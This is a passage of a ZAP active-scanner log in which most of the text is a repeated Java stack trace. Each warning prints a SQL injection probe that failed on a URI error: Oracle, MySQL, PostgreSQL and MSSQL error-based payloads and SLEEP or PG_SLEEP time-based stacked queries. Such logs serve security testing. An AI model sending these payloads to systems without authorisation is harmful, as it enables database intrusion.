org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685400 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) AND 1360=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1360=1360) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (5486=5486] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685402 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 2291=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2291=2291) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685403 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') AND 5663=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5663=5663) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('bwrc'='bwrc] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685404 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' AND 4225=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4225=4225) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'qiEk'='qiEk] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685406 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' AND 1805=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1805=1805) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685407 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 3036=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3036=3036) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- dUNw] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685408 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 1087 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(1087=1087,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685409 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(9794=9794,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685411 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6660=6660) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685413 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4355=4355) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685415 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP);(SELECT * FROM (SELECT(SLEEP(5)))wukE)#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685416 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP;(SELECT * FROM (SELECT(SLEEP(5)))Jzcd)#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685417 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP');(SELECT * FROM (SELECT(SLEEP(5)))foWF)#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685419 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP';(SELECT * FROM (SELECT(SLEEP(5)))CupI)#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685420 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%';(SELECT * FROM (SELECT(SLEEP(5)))rNAG)#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685422 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP;(SELECT * FROM (SELECT(SLEEP(5)))NzFw)#] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685423 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685424 [ZAP-ActiveScanner-0] WARN 